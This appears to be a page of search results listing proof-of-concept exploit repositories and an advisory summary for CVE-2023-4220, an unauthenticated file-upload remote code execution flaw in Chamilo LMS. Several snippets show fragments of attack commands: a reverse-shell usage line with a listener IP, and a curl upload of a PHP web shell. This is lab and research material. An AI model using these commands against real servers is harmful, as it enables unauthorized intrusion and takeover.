8 matches found
chamilo-lms-unauthenticated-big-upload-rce-poc
Chamilo LMS Unauthenticated Big Upload File RCE PoC This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220. The system is vulnerable in versions preceding 1.11.24. Usage Clone the repository to your machine and instal...
CVE-2023-4220-Chamilo-LMS
Chamilo LMS Vulnerabilidad RCE por Carga Masiva No Autenticada PoC Este script permite la explotación de la falla de seguridad del software Chamilo LMS descrita en CVE-2023-4220. El sistema es vulnerable en versiones anteriores a 1.11.24. Uso Clona el repositorio en tu máquina e instala las...
CVE-2023-4220
Exploit CVE-2023-4220 Chamilo LMS: Ejecución remota de código sin autenticación mediante la subida de archivos grandes Uso de cve-2023-4220.sh ./cve-2023-4220.sh ./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1 root@kitploit: ./cve-2023-4220.sh -h Usage for RevShell: ./cve-2023-4220.sh Example...
CVE-2023-4220
CVE-2023-4220 RCE Chamilo 1.11.24 | https://starlabs.sg/advisories/23/23-4220/ | | Chamilo LMS /tmp/rce.php EOF curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URLUPLD" CMD=$echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; printurllib.parse.quoteplussys.stdin.read" curl...
CVE-2023-4220-PoC
CVE-2023-4220 Subida Arbitraria de Archivos / RCE - PoC Creé este script para automatizar la explotación de CVE-2023-4220 y obtener una reverse shell en la máquina PermX de Hack The Box. Esta vulnerabilidad afecta a Chamilo LMS versiones ≤ 1.11.24 , debido a una validación insuficiente en la...
Exploit for Unrestricted Upload of File with Dangerous Type in Chamilo Chamilo_Lms
CVE-2023-4220 Chamilo LMS Unauthenticated Big Upload File Re...
Exploit for Unrestricted Upload of File with Dangerous Type in Chamilo Chamilo_Lms
Chamilo LMS Unauthenticated Big Upload File RCE PoC This is a...
PT-2023-28292 · Unknown · Chamilo Lms
Name of the Vulnerable Software and Affected Versions: Chamilo LMS versions prior to 1.11.24 Description: The issue allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell, specifically through the big file upload...